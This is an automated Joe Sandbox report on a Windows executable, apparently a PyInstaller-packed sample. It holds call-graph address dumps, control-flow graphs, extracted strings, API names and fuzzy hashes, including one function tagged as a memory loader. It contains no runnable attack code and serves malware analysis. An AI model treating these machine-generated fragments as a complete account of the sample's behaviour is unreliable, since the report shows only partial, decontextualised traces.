_log10_special 88453->88535 88456 7ff6fb1e5d4f 88454->88456 88457 7ff6fb1e5d60 88454->88457 88536 7ff6fb1e25f0 53 API calls _log10_special 88456->88536 88518 7ff6fb1e45a0 88457->88518 88461 7ff6fb1e5d6f 88537 7ff6fb1e25f0 53 API calls _log10_special 88461->88537 88462 7ff6fb1e5d80 88464 7ff6fb1e5d8f 88462->88464 88465 7ff6fb1e5da0 88462->88465 88538 7ff6fb1e25f0 53 API calls _log10_special 88464->88538 88467 7ff6fb1e5db1 88465->88467 88469 7ff6fb1e5dc2 88465->88469 88539 7ff6fb1e25f0 53 API calls _log10_special 88467->88539 88472 7ff6fb1e5dec 88469->88472 88540 7ff6fb1f65c0 73 API calls 88469->88540 88471 7ff6fb1e5dda 88541 7ff6fb1f65c0 73 API calls 88471->88541 88472->88447 88542 7ff6fb1e25f0 53 API calls _log10_special 88472->88542 88476 7ff6fb1e5820 88475->88476 88476->88476 88477 7ff6fb1e5849 88476->88477 88482 7ff6fb1e5860 __std_exception_copy 88476->88482 88546 7ff6fb1e25f0 53 API calls _log10_special 88477->88546 88479 7ff6fb1e5855 88479->88344 88480 7ff6fb1e596b 88480->88344 88481 7ff6fb1e1440 116 API calls 88481->88482 88482->88480 88482->88481 88483 7ff6fb1e25f0 53 API calls 88482->88483 88483->88482 88484->88340 88486 7ff6fb1e3f1a 88485->88486 88487 7ff6fb1e86b0 2 API calls 88486->88487 88488 7ff6fb1e3f3f 88487->88488 88489 7ff6fb1eb870 _log10_special 8 API calls 88488->88489 88490 7ff6fb1e3f67 88489->88490 88490->88421 88490->88423 88492 7ff6fb1e86b0 2 API calls 88491->88492 88493 7ff6fb1e81b4 LoadLibraryW 88492->88493 88494 7ff6fb1e81d3 __std_exception_copy 88493->88494 88494->88429 88495->88413 88496->88415 88497->88413 88498->88413 88499->88413 88502 7ff6fb1e4cac 88500->88502 88501 7ff6fb1e4cb4 88501->88438 88502->88501 88505 7ff6fb1e4e54 88502->88505 88543 7ff6fb1f5db4 48 API calls 88502->88543 88503 7ff6fb1e5017 __std_exception_copy 88503->88438 88504 7ff6fb1e4180 47 API calls 88504->88505 88505->88503 88505->88504 88508 7ff6fb1e4480 88507->88508 88509 7ff6fb1eb870 _log10_special 8 API calls 88508->88509 88510 7ff6fb1e44ea 88509->88510 88510->88444 88510->88445 88512 7ff6fb1e476f 88511->88512 88516 7ff6fb1e471b 88511->88516 88545 7ff6fb1e4300 MultiByteToWideChar MultiByteToWideChar __std_exception_copy 88512->88545 88514 7ff6fb1e477c 88514->88452 88517 7ff6fb1e475a 88516->88517 88544 7ff6fb1e4300 MultiByteToWideChar MultiByteToWideChar __std_exception_copy 88516->88544 88517->88452 88519 7ff6fb1e45b5 88518->88519 88520 7ff6fb1e1bf0 49 API calls 88519->88520 88521 7ff6fb1e4601 88520->88521 88522 7ff6fb1e4687 __std_exception_copy 88521->88522 88523 7ff6fb1e1bf0 49 API calls 88521->88523 88525 7ff6fb1eb870 _log10_special 8 API calls 88522->88525 88524 7ff6fb1e4640 88523->88524 88524->88522 88527 7ff6fb1e86b0 2 API calls 88524->88527 88526 7ff6fb1e46dc 88525->88526 88526->88461 88526->88462 88528 7ff6fb1e465a 88527->88528 88529 7ff6fb1e86b0 2 API calls 88528->88529 88530 7ff6fb1e4671 88529->88530 88531 7ff6fb1e86b0 2 API calls 88530->88531 88531->88522 88532->88447 88533->88447 88534->88447 88535->88447 88536->88447 88537->88447 88538->88447 88539->88447 88540->88471 88541->88472 88542->88447 88543->88502 88544->88517 88545->88514 88546->88479 88548 7ff6fb1f6c08 88547->88548 88551 7ff6fb1f66e4 88548->88551 88550 7ff6fb1f6c21 88550->88356 88552 7ff6fb1f672e 88551->88552 88553 7ff6fb1f66ff 88551->88553 88561 7ff6fb1f477c EnterCriticalSection 88552->88561 88562 7ff6fb1f9b24 37 API calls 2 library calls 88553->88562 88556 7ff6fb1f6733 88558 7ff6fb1f6750 38 API calls 88556->88558 88557 7ff6fb1f671f 88557->88550 88559 7ff6fb1f673f 88558->88559 88560 7ff6fb1f4788 _fread_nolock LeaveCriticalSection 88559->88560 88560->88557 88562->88557 88563 7ff6fb1eab3c 88564 7ff6fb1e9e3a 88563->88564 88566 7ff6fb1e9eb6 88564->88566 88567 7ff6fb1eb0b0 88564->88567 88568 7ff6fb1eb0d3 88567->88568 88569 7ff6fb1eb0f1 memcpy_s 88567->88569 88571 7ff6fb1fc90c 88568->88571 88569->88566 88572 7ff6fb1fc957 88571->88572 88576 7ff6fb1fc91b _get_daylight 88571->88576 88579 7ff6fb1f43f4 11 API calls _get_daylight 88572->88579 88574 7ff6fb1fc93e RtlAllocateHeap 88575 7ff6fb1fc955 88574->88575 88574->88576 88575->88569 88576->88572 88576->88574 88578 7ff6fb2028a0 EnterCriticalSection LeaveCriticalSection _get_daylight 88576->88578 88578->88576 88579->88575 88580 7ffdfb381109 88581 7ffdfb397be0 88580->88581 88584 7ffdfb397cd0 88581->88584 88583 7ffdfb397bfb 88585 7ffdfb3812ee 88584->88585 88586 7ffdfb397cf0 SetLastError 88585->88586 88587 7ffdfb397d17 88586->88587 88587->88583 88621 7ffdfb38b370 88624 7ffdfb38b38f 88621->88624 88623 7ffdfb38b4f2 88624->88623 88625 7ffdfb381253 88624->88625 88625->88623 88627 7ffdfb38dc10 88625->88627 88626 7ffdfb38dce6 88626->88623 88627->88626 88628 7ffdfb38dc8e SetLastError 88627->88628 88628->88626 88628->88627 88588 7ff6fb1f4938 88589 7ff6fb1f4952 88588->88589 88590 7ff6fb1f496f 88588->88590 88613 7ff6fb1f43d4 11 API calls _get_daylight 88589->88613 88590->88589 88592 7ff6fb1f4982 CreateFileW 88590->88592 88594 7ff6fb1f49ec 88592->88594 88595 7ff6fb1f49b6 88592->88595 88593 7ff6fb1f4957 88614 7ff6fb1f43f4 11 API calls _get_daylight 88593->88614 88617 7ff6fb1f4f14 46 API calls 3 library calls 88594->88617 88616 7ff6fb1f4a8c 59 API calls 3 library calls 88595->88616 88599 7ff6fb1f49f1 88602 7ff6fb1f49f5 88599->88602 88603 7ff6fb1f4a20 88599->88603 88600 7ff6fb1f495f 88615 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 88600->88615 88601 7ff6fb1f49c4 88605 7ff6fb1f49e1 CloseHandle 88601->88605 88606 7ff6fb1f49cb CloseHandle 88601->88606 88618 7ff6fb1f4368 11 API calls 2 library calls 88602->88618 88619 7ff6fb1f4cd4 51 API calls 88603->88619 88609 7ff6fb1f496a 88605->88609 88606->88609 88610 7ff6fb1f4a2d 88620 7ff6fb1f4e10 21 API calls _fread_nolock 88610->88620 88612 7ff6fb1f49ff 88612->88609 88613->88593 88614->88600 88615->88609 88616->88601 88617->88599 88618->88612 88619->88610 88620->88612 88629 7ffdfb381956 88630 7ffdfb38ffd0 88629->88630 88631 7ffdfb390c2f 00007FFE1FFB6570 88630->88631 88636 7ffdfb390144 88630->88636 88632 7ffdfb390c50 00007FFE1FFB6570 88631->88632 88631->88636 88633 7ffdfb390c70 00007FFE1FFB6570 88632->88633 88632->88636 88634 7ffdfb390c8b 00007FFE1FFB6570 88633->88634 88633->88636 88635 7ffdfb390ca3 00007FFE1FFB6570 88634->88635 88634->88636 88635->88636

                                                              Executed Functions

                                                              Function 00007FF6FB1E1000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 7ff6fb1e1000-7ff6fb1e3536 call 7ff6fb1ef138 call 7ff6fb1ef140 call 7ff6fb1ebb70 call 7ff6fb1f4700 call 7ff6fb1f4794 call 7ff6fb1e33e0 14 7ff6fb1e3544-7ff6fb1e3566 call 7ff6fb1e18f0 0->14 15 7ff6fb1e3538-7ff6fb1e353f 0->15 21 7ff6fb1e356c-7ff6fb1e3583 call 7ff6fb1e1bf0 14->21 22 7ff6fb1e3736-7ff6fb1e374c call 7ff6fb1e3f70 14->22 16 7ff6fb1e371a-7ff6fb1e3735 call 7ff6fb1eb870 15->16 26 7ff6fb1e3588-7ff6fb1e35c1 21->26 27 7ff6fb1e3785-7ff6fb1e379a call 7ff6fb1e25f0 22->27 28 7ff6fb1e374e-7ff6fb1e377b call 7ff6fb1e76a0 22->28 29 7ff6fb1e3653-7ff6fb1e366d call 7ff6fb1e7e10 26->29 30 7ff6fb1e35c7-7ff6fb1e35cb 26->30 41 7ff6fb1e3712 27->41 45 7ff6fb1e379f-7ff6fb1e37be call 7ff6fb1e1bf0 28->45 46 7ff6fb1e377d-7ff6fb1e3780 call 7ff6fb1ef36c 28->46 42 7ff6fb1e3695-7ff6fb1e369c 29->42 43 7ff6fb1e366f-7ff6fb1e3675 29->43 34 7ff6fb1e35cd-7ff6fb1e35e5 call 7ff6fb1f4560 30->34 35 7ff6fb1e3638-7ff6fb1e364d call 7ff6fb1e18e0 30->35 50 7ff6fb1e35f2-7ff6fb1e360a call 7ff6fb1f4560 34->50 51 7ff6fb1e35e7-7ff6fb1e35eb 34->51 35->29 35->30 41->16 53 7ff6fb1e36a2-7ff6fb1e36c0 call 7ff6fb1e7e10 call 7ff6fb1e7f80 42->53 54 7ff6fb1e3844-7ff6fb1e3863 call 7ff6fb1e3e90 42->54 48 7ff6fb1e3682-7ff6fb1e3690 call 7ff6fb1f415c 43->48 49 7ff6fb1e3677-7ff6fb1e3680 43->49 61 7ff6fb1e37c1-7ff6fb1e37ca 45->61 46->27 48->42 49->48 66 7ff6fb1e360c-7ff6fb1e3610 50->66 67 7ff6fb1e3617-7ff6fb1e362f call 7ff6fb1f4560 50->67 51->50 78 7ff6fb1e380f-7ff6fb1e381e call 7ff6fb1e8400 53->78 79 7ff6fb1e36c6-7ff6fb1e36c9 53->79 69 7ff6fb1e3865-7ff6fb1e386f call 7ff6fb1e3fe0 54->69 70 7ff6fb1e3871-7ff6fb1e3882 call 7ff6fb1e1bf0 54->70 61->61 65 7ff6fb1e37cc-7ff6fb1e37e9 call 7ff6fb1e18f0 61->65 65->26 83 7ff6fb1e37ef-7ff6fb1e3800 call 7ff6fb1e25f0 65->83 66->67 67->35 84 7ff6fb1e3631 67->84 81 7ff6fb1e3887-7ff6fb1e38a1 call 7ff6fb1e86b0 69->81 70->81 91 7ff6fb1e3820 78->91 92 7ff6fb1e382c-7ff6fb1e3836 call 7ff6fb1e7c40 78->92 79->78 85 7ff6fb1e36cf-7ff6fb1e36f6 call 7ff6fb1e1bf0 79->85 93 7ff6fb1e38a3 81->93 94 7ff6fb1e38af-7ff6fb1e38c1 SetDllDirectoryW 81->94 83->41 84->35 100 7ff6fb1e3805-7ff6fb1e380d call 7ff6fb1f415c 85->100 101 7ff6fb1e36fc-7ff6fb1e3703 call 7ff6fb1e25f0 85->101 91->92 92->81 110 7ff6fb1e3838 92->110 93->94 98 7ff6fb1e38c3-7ff6fb1e38ca 94->98 99 7ff6fb1e38d0-7ff6fb1e38ec call 7ff6fb1e6560 call 7ff6fb1e6b00 94->99 98->99 103 7ff6fb1e3a50-7ff6fb1e3a58 98->103 118 7ff6fb1e38ee-7ff6fb1e38f4 99->118 119 7ff6fb1e3947-7ff6fb1e394a call 7ff6fb1e6510 99->119 100->81 107 7ff6fb1e3708-7ff6fb1e370a 101->107 108 7ff6fb1e3a5a-7ff6fb1e3a77 PostMessageW GetMessageW 103->108 109 7ff6fb1e3a7d-7ff6fb1e3a88 call 7ff6fb1e33d0 call 7ff6fb1e3080 103->109 107->41 108->109 120 7ff6fb1e3a8d-7ff6fb1e3aaf call 7ff6fb1e33a0 call 7ff6fb1e6780 call 7ff6fb1e6510 109->120 110->54 121 7ff6fb1e390e-7ff6fb1e3918 call 7ff6fb1e6970 118->121 122 7ff6fb1e38f6-7ff6fb1e3903 call 7ff6fb1e65a0 118->122 127 7ff6fb1e394f-7ff6fb1e3956 119->127 133 7ff6fb1e3923-7ff6fb1e3931 call 7ff6fb1e6cd0 121->133 134 7ff6fb1e391a-7ff6fb1e3921 121->134 122->121 136 7ff6fb1e3905-7ff6fb1e390c 122->136 127->103 131 7ff6fb1e395c-7ff6fb1e3966 call 7ff6fb1e30e0 127->131 131->107 141 7ff6fb1e396c-7ff6fb1e3980 call 7ff6fb1e83e0 131->141 133->127 146 7ff6fb1e3933 133->146 137 7ff6fb1e393a-7ff6fb1e3942 call 7ff6fb1e2870 call 7ff6fb1e6780 134->137 136->137 137->119 151 7ff6fb1e3982-7ff6fb1e399f PostMessageW GetMessageW 141->151 152 7ff6fb1e39a5-7ff6fb1e39e8 call 7ff6fb1e7f20 call 7ff6fb1e7fc0 call 7ff6fb1e6780 call 7ff6fb1e6510 call 7ff6fb1e7ec0 141->152 146->137 151->152 163 7ff6fb1e39ea-7ff6fb1e3a00 call 7ff6fb1e81f0 call 7ff6fb1e7ec0 152->163 164 7ff6fb1e3a3d-7ff6fb1e3a4b call 7ff6fb1e18a0 152->164 163->164 171 7ff6fb1e3a02-7ff6fb1e3a10 163->171 164->107 172 7ff6fb1e3a12-7ff6fb1e3a2c call 7ff6fb1e25f0 call 7ff6fb1e18a0 171->172 173 7ff6fb1e3a31-7ff6fb1e3a38 call 7ff6fb1e2870 171->173 172->107 173->164
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileModuleName
                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback
                                                              • API String ID: 514040917-1099759049
                                                              • Opcode ID: bd5132a996e21c3b955ef89ab5ecb1a2b08bd885b3b328e7f6b5000dab4d0f26
                                                              • Instruction ID: 4351c9cd71c9236011f0d0ad4ca458a0147431b02101637dfaa68685ba63fe4e
                                                              • Opcode Fuzzy Hash: bd5132a996e21c3b955ef89ab5ecb1a2b08bd885b3b328e7f6b5000dab4d0f26
                                                              • Instruction Fuzzy Hash: 37F14D61E0868391FB19EB21E5652FD6261AF5D788F844031DA6DC3AE6FF2CF568C340
                                                              Function 00007FFDFB381956 Relevance: 23.5, APIs: 5, Strings: 8, Instructions: 785COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1991624093.00007FFDFB381000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFB380000, based on PE: true
                                                              • Associated: 00000001.00000002.1991585735.00007FFDFB380000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F3000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB418000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB423000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB42D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1992057570.00007FFDFB430000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1992103361.00007FFDFB432000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb380000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $..\s\ssl\record\ssl3_record.c$@$CONNE$GET $HEAD $POST $PUT
                                                              • API String ID: 0-352295518
                                                              • Opcode ID: 10e9551b73dd26cc253e512a061e753fef7e6259af78dc632876357d1c9699b4
                                                              • Instruction ID: 7e05ff9db9aa2c38861f1c02c1081ea02abf3a24abcaed19432e27280c9f3260
                                                              • Opcode Fuzzy Hash: 10e9551b73dd26cc253e512a061e753fef7e6259af78dc632876357d1c9699b4
                                                              • Instruction Fuzzy Hash: 0A727F32B4A64387FB60AA15D464BBD27E2EB44B8CF544135DA6C8B6E8CF7DE584C700
                                                              Function 00007FF6FB205C74 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 615 7ff6fb205c74-7ff6fb205ce7 call 7ff6fb2059a8 618 7ff6fb205d01-7ff6fb205d0b call 7ff6fb1f7830 615->618 619 7ff6fb205ce9-7ff6fb205cf2 call 7ff6fb1f43d4 615->619 625 7ff6fb205d0d-7ff6fb205d24 call 7ff6fb1f43d4 call 7ff6fb1f43f4 618->625 626 7ff6fb205d26-7ff6fb205d8f CreateFileW 618->626 624 7ff6fb205cf5-7ff6fb205cfc call 7ff6fb1f43f4 619->624 642 7ff6fb206042-7ff6fb206062 624->642 625->624 627 7ff6fb205d91-7ff6fb205d97 626->627 628 7ff6fb205e0c-7ff6fb205e17 GetFileType 626->628 631 7ff6fb205dd9-7ff6fb205e07 GetLastError call 7ff6fb1f4368 627->631 632 7ff6fb205d99-7ff6fb205d9d 627->632 634 7ff6fb205e6a-7ff6fb205e71 628->634 635 7ff6fb205e19-7ff6fb205e54 GetLastError call 7ff6fb1f4368 CloseHandle 628->635 631->624 632->631 640 7ff6fb205d9f-7ff6fb205dd7 CreateFileW 632->640 638 7ff6fb205e73-7ff6fb205e77 634->638 639 7ff6fb205e79-7ff6fb205e7c 634->639 635->624 650 7ff6fb205e5a-7ff6fb205e65 call 7ff6fb1f43f4 635->650 645 7ff6fb205e82-7ff6fb205ed7 call 7ff6fb1f7748 638->645 639->645 646 7ff6fb205e7e 639->646 640->628 640->631 653 7ff6fb205ed9-7ff6fb205ee5 call 7ff6fb205bb0 645->653 654 7ff6fb205ef6-7ff6fb205f27 call 7ff6fb205728 645->654 646->645 650->624 653->654 662 7ff6fb205ee7 653->662 660 7ff6fb205f2d-7ff6fb205f6f 654->660 661 7ff6fb205f29-7ff6fb205f2b 654->661 664 7ff6fb205f91-7ff6fb205f9c 660->664 665 7ff6fb205f71-7ff6fb205f75 660->665 663 7ff6fb205ee9-7ff6fb205ef1 call 7ff6fb1f9dd0 661->663 662->663 663->642 667 7ff6fb205fa2-7ff6fb205fa6 664->667 668 7ff6fb206040 664->668 665->664 666 7ff6fb205f77-7ff6fb205f8c 665->666 666->664 667->668 670 7ff6fb205fac-7ff6fb205ff1 CloseHandle CreateFileW 667->670 668->642 672 7ff6fb205ff3-7ff6fb206021 GetLastError call 7ff6fb1f4368 call 7ff6fb1f7970 670->672 673 7ff6fb206026-7ff6fb20603b 670->673 672->673 673->668
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                              • String ID:
                                                              • API String ID: 1617910340-0
                                                              • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                              • Instruction ID: e2f944a9e83ba7e30b59ec9f2f177da379f5a2a71d054c596229b18e502c4fc3
                                                              • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                              • Instruction Fuzzy Hash: 29C19E36B28A4686EB10CF69C5A06BC3761FB59B98B012225DE6ED77E4EF38D551C300
                                                              Function 00007FFDFB354460 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 893librarymemoryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                              • String ID: s"5
                                                              • API String ID: 3300690313-1492618520
                                                              • Opcode ID: 0f3ea391c28ca89a74bd740658b8751246de311d9d9a1ab4a8ab4f2b2ce55410
                                                              • Instruction ID: ae25e35669495baca2c61ef3e5ec8f7160a9078362c59fd97b365c0bc655a726
                                                              • Opcode Fuzzy Hash: 0f3ea391c28ca89a74bd740658b8751246de311d9d9a1ab4a8ab4f2b2ce55410
                                                              • Instruction Fuzzy Hash: 1062252272919387E7199E38E91067976E0F748785F059531EAAEC37ECEA3CFA45C700
                                                              Function 00007FF6FB1E85A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                              • Instruction ID: 51284713ea7a4f52c2f1898fb99e4ccaf49759f3994e392812a3888dd175179d
                                                              • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                              • Instruction Fuzzy Hash: 72F04426A1964386F770CB60B59976A7360AB4C768F041235D97E82AE4EF7CE0598B04
                                                              Function 00007FF6FB1E18F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 435 7ff6fb1e18f0-7ff6fb1e192b call 7ff6fb1e3f70 438 7ff6fb1e1bc1-7ff6fb1e1be5 call 7ff6fb1eb870 435->438 439 7ff6fb1e1931-7ff6fb1e1971 call 7ff6fb1e76a0 435->439 444 7ff6fb1e1bae-7ff6fb1e1bb1 call 7ff6fb1ef36c 439->444 445 7ff6fb1e1977-7ff6fb1e1987 call 7ff6fb1ef9f4 439->445 448 7ff6fb1e1bb6-7ff6fb1e1bbe 444->448 450 7ff6fb1e19a1-7ff6fb1e19bd call 7ff6fb1ef6bc 445->450 451 7ff6fb1e1989-7ff6fb1e199c call 7ff6fb1e2760 445->451 448->438 456 7ff6fb1e19bf-7ff6fb1e19d2 call 7ff6fb1e2760 450->456 457 7ff6fb1e19d7-7ff6fb1e19ec call 7ff6fb1f4154 450->457 451->444 456->444 462 7ff6fb1e19ee-7ff6fb1e1a01 call 7ff6fb1e2760 457->462 463 7ff6fb1e1a06-7ff6fb1e1a87 call 7ff6fb1e1bf0 * 2 call 7ff6fb1ef9f4 457->463 462->444 471 7ff6fb1e1a8c-7ff6fb1e1a9f call 7ff6fb1f4170 463->471 474 7ff6fb1e1aa1-7ff6fb1e1ab4 call 7ff6fb1e2760 471->474 475 7ff6fb1e1ab9-7ff6fb1e1ad2 call 7ff6fb1ef6bc 471->475 474->444 480 7ff6fb1e1ad4-7ff6fb1e1ae7 call 7ff6fb1e2760 475->480 481 7ff6fb1e1aec-7ff6fb1e1b08 call 7ff6fb1ef430 475->481 480->444 486 7ff6fb1e1b1b-7ff6fb1e1b29 481->486 487 7ff6fb1e1b0a-7ff6fb1e1b16 call 7ff6fb1e25f0 481->487 486->444 489 7ff6fb1e1b2f-7ff6fb1e1b3e 486->489 487->444 491 7ff6fb1e1b40-7ff6fb1e1b46 489->491 492 7ff6fb1e1b60-7ff6fb1e1b6f 491->492 493 7ff6fb1e1b48-7ff6fb1e1b55 491->493 492->492 494 7ff6fb1e1b71-7ff6fb1e1b7a 492->494 493->494 495 7ff6fb1e1b8f 494->495 496 7ff6fb1e1b7c-7ff6fb1e1b7f 494->496 498 7ff6fb1e1b91-7ff6fb1e1bac 495->498 496->495 497 7ff6fb1e1b81-7ff6fb1e1b84 496->497 497->495 499 7ff6fb1e1b86-7ff6fb1e1b89 497->499 498->444 498->491 499->495 500 7ff6fb1e1b8b-7ff6fb1e1b8d 499->500 500->498
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
